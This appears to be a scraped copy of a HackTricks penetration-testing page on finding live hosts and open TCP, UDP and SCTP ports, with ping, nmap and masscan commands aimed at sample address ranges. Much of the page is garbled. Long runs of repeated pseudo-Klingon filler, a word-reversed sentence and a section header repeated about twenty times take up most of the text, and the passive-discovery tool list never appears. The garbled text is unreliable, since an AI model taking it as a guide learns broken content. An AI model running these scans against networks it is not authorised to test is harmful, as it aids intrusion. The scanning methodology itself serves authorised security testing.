hacktricks/generic-methodologies-and-resources/pentesting-network

Pentesting Network

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

• If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
• Get the official PEASS & HackTricks swag
• Discover The PEASS Family, our collection of exclusive NFTs
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Bug bounty tip: sign up for Intigriti, a premium bug bounty platform created by hackers, for hackers! Join us at https://go.intigriti.com/hacktricks today, and start earning bounties up to $100,000!

{% embed url="https://go.intigriti.com/hacktricks" %}

Discovering hosts from the outside

This is going to be a brief section about how to find IPs responding from the Internet.
In this situation you have some scope of IPs (maybe even several ranges) and you just to find which IPs are responding.

ICMP

This is the easiest and fastest way to discover if a host is up or not.
You could try to send some ICMP packets and expect responses. The easiest way is just sending an echo request and expect from the response. You can do that using a simple pingor using fpingfor ranges.
You could also use nmap to send other types of ICMP packets (this will avoid filters to common ICMP echo request-response).

ping -c 1 199.66.11.4    # 1 echo request to a host
fping -g 199.66.11.0/24  # Send echo requests to ranges
nmap -PE -PM -PP -sn -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests

TCP Port Discovery

QapmeH vItlhutlh je. ICMP tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh tlhIngan ghItlh **tlh

#Using masscan to scan top20ports of nmap in a /24 range (less than 5min)
masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 199.66.11.0/24

nmap jatlhlaHbe'chugh, 'ach 'oH vItlhutlh 'ej 'oH nmap vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh '

masscan -p80,443,8000-8100,8443 199.66.11.0/24

UDP Port Discovery

tlhIngan Hol translation:

UDP port vItlhutlh:

Host vItlhutlh attention pay should port open UDP check to try also could. UDP services usually don't respond with any data to a regular empty UDP probe packet it is difficult to say if a port is being filtered or open. The easiest way to decide this is to send a packet related to the running service, and as you don't know which service is running, you should try the most probable based on the port number:

nmap -sU -sV --version-intensity 0 -F -n 199.66.11.53/24
# The -sV will make nmap test each possible known UDP service packet
# The "--version-intensity 0" will make nmap only test the most probable

nmap line proposed before will test the top 1000 UDP ports in every host inside the /24 range but even only this will take >20min. If need fastest results you can use udp-proto-scanner: ./udp-proto-scanner.pl 199.66.11.53/24 This will send these UDP probes to their expected port (for a /24 range this will just take 1 min): DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, RPCCheck, SNMPv3GetRequest, chargen, citrix, daytime, db2, echo, gtpv1, ike,ms-sql, ms-sql-slam, netop, ntp, rpc, snmp-public, systat, tftp, time, xdmcp.

SCTP Port Discovery

#Probably useless, but it's pretty fast, why not trying?
nmap -T4 -sY -n --open -Pn <IP/range>

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

